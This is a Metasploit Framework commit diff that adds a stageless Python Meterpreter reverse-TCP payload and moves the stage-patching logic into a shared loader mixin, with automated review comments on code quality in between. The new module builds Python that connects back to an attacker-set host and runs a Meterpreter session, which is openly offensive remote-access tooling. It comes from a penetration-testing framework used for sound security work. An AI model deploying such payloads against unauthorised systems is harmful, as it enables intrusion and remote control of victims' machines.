Add stageless Python Meterpreter for reverse tcp

bug/bundler_fix
Spencer McIntyre 2015-10-21 18:23:04 -04:00
parent 129544c18b
commit 8bb694fa5c
3 changed files with 124 additions and 22 deletions


@ -0,0 +1,72 @@
# -*- coding: binary -*-
require 'msf/core'
require 'msf/core/payload/uuid/options'
module Msf
###
#
# Common module stub for ARCH_PYTHON payloads that make use of Meterpreter.
#
###
module Payload::Python::MeterpreterLoader
include Msf::Payload::UUID::Options
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Meterpreter & Configuration',
'Description' => 'Run Meterpreter & the configuration stub',
'Author' => [ 'Spencer McIntyre' ],
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Stager' => {'Payload' => ""}
))
register_advanced_options([
OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
], self.class)
end
# Get the raw Python Meterpreter stage and patch in values based on the
# configuration
#
# @param opts [Hash] The options to use for patching the stage data.
# @option opts [String] :stageless_tcp_socket_setup Python code to execute to
# setup a tcp socket to allow use of the stage as a stageless payload.
# @option opts [String] :uuid A specific UUID to use for sessions created by
# this stage.
def stage_meterpreter(opts={})
met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
if datastore['PythonMeterpreterDebug']
met = met.sub("DEBUGGING = False", "DEBUGGING = True")
end
met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
uuid = opts[:uuid] || generate_payload_uuid
uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
# patch in any optional stageless tcp socket setup
unless opts[:stageless_tcp_socket_setup].nil?
socket_setup = opts[:stageless_tcp_socket_setup]
socket_setup = socket_setup.split("\n")
socket_setup.map! {|line| "\t\t#{line}\n"}
socket_setup = socket_setup.join
met.sub!("\t\t# PATCH-SETUP-STAGELESS-TCP-SOCKET #", socket_setup)
end
met
end
end
end
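Review bot: The stageless socket code is spliced in on the `PATCH-SETUP-STAGELESS-TCP-SOCKET` line with `String#sub!` and a plain string replacement, so any backslash sequence in the supplied Python (`\\`, `\'`, `\1`) is interpreted as a back-reference instead of copied through, and when the marker is not present in meterpreter.py the `sub!` returns nil and the socket setup is silently dropped, leaving a stage that never connects; the two lines the current caller passes contain no backslashes, but the block form fails loudly and inserts verbatim: `raise "stageless socket marker not found in meterpreter.py" unless met.sub!("\t\t# PATCH-SETUP-STAGELESS-TCP-SOCKET #") { socket_setup }`. Two smaller points in the same method: `Rex::Text.to_hex(uuid.to_raw, prefix = '')` assigns a throwaway local rather than passing a keyword and reads as `Rex::Text.to_hex(uuid.to_raw, '')`; and the module references `Msf::Sessions::MeterpreterOptions` while requiring only 'msf/core' and the UUID options, whereas the stage module in the third file drops its explicit `require 'msf/base/sessions/meterpreter_options'` in this same commit, so both now depend on something else having loaded it first — presumably fine under the framework loader, but keeping that require here makes the mixin self-contained.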


@ -0,0 +1,44 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/python'
require 'msf/core/payload/python/meterpreter_loader'
require 'msf/core/payload/python/reverse_tcp'
require 'msf/base/sessions/meterpreter_python'
module Metasploit4
CachedSize = 49398
include Msf::Payload::Single
include Msf::Payload::Python
include Msf::Payload::Python::ReverseTcp
include Msf::Payload::Python::MeterpreterLoader
def initialize(info = {})
super(merge_info(info,
'Name' => 'Python Meterpreter Shell, Reverse TCP Inline',
'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_Python_Python
))
end
def generate_reverse_tcp(opts={})
socket_setup = "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
socket_setup << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
opts[:stageless_tcp_socket_setup] = socket_setup
met = stage_meterpreter(opts)
py_create_exec_stub(met)
end
end
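Review bot: `generate_reverse_tcp` stores the socket code into `opts[:stageless_tcp_socket_setup]` before passing the hash on, so whoever supplied `opts` gets it mutated as a side effect; passing a copy keeps the caller's hash intact, `met = stage_meterpreter(opts.merge(stageless_tcp_socket_setup: socket_setup))`, with the assignment line dropped. The host is also interpolated directly into a Python string literal on the `s.connect` line, so an LHOST value containing a single quote would produce a syntax error in the generated stub rather than an error at generation time — worth a short comment stating that `opts[:host]` is expected to be a bare address or hostname, or a check that it contains no `'`.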


@ -5,43 +5,29 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/python'
require 'msf/core/payload/python/meterpreter_loader'
require 'msf/base/sessions/meterpreter_python'
require 'msf/base/sessions/meterpreter_options'
module Metasploit3
include Msf::Sessions::MeterpreterOptions
module Metasploit4
include Msf::Payload::Python::MeterpreterLoader
def initialize(info = {})
super(update_info(info,
'Name' => 'Python Meterpreter',
'Description' => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.4)',
'Description' => 'Run a meterpreter server in Python (2.5-2.7 & 3.1-3.5)',
'Author' => 'Spencer McIntyre',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_Python_Python
))
register_advanced_options([
OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
], self.class)
end
def generate_stage(opts={})
met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
if datastore['PythonMeterpreterDebug']
met = met.sub("DEBUGGING = False", "DEBUGGING = True")
end
met.sub!('SESSION_EXPIRATION_TIMEOUT = 604800', "SESSION_EXPIRATION_TIMEOUT = #{datastore['SessionExpirationTimeout']}")
met.sub!('SESSION_COMMUNICATION_TIMEOUT = 300', "SESSION_COMMUNICATION_TIMEOUT = #{datastore['SessionCommunicationTimeout']}")
met.sub!('SESSION_RETRY_TOTAL = 3600', "SESSION_RETRY_TOTAL = #{datastore['SessionRetryTotal']}")
met.sub!('SESSION_RETRY_WAIT = 10', "SESSION_RETRY_WAIT = #{datastore['SessionRetryWait']}")
uuid = opts[:uuid] || generate_payload_uuid
uuid = Rex::Text.to_hex(uuid.to_raw, prefix = '')
met.sub!("PAYLOAD_UUID = \'\'", "PAYLOAD_UUID = \'#{uuid}\'")
met
stage_meterpreter(opts)
end
end
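Review bot: `generate_stage` is now a bare delegate to `stage_meterpreter`, and nothing left in this file tells a reader that the UUID, session timeout and debug-flag patching moved into `Msf::Payload::Python::MeterpreterLoader`; a one-line comment above it, `# Stage bytes come from MeterpreterLoader#stage_meterpreter, which patches the UUID, session timeouts and debug flag from the datastore`, keeps that discoverable. The rest of this section is a move of the old body into the mixin and reads correctly against the first file.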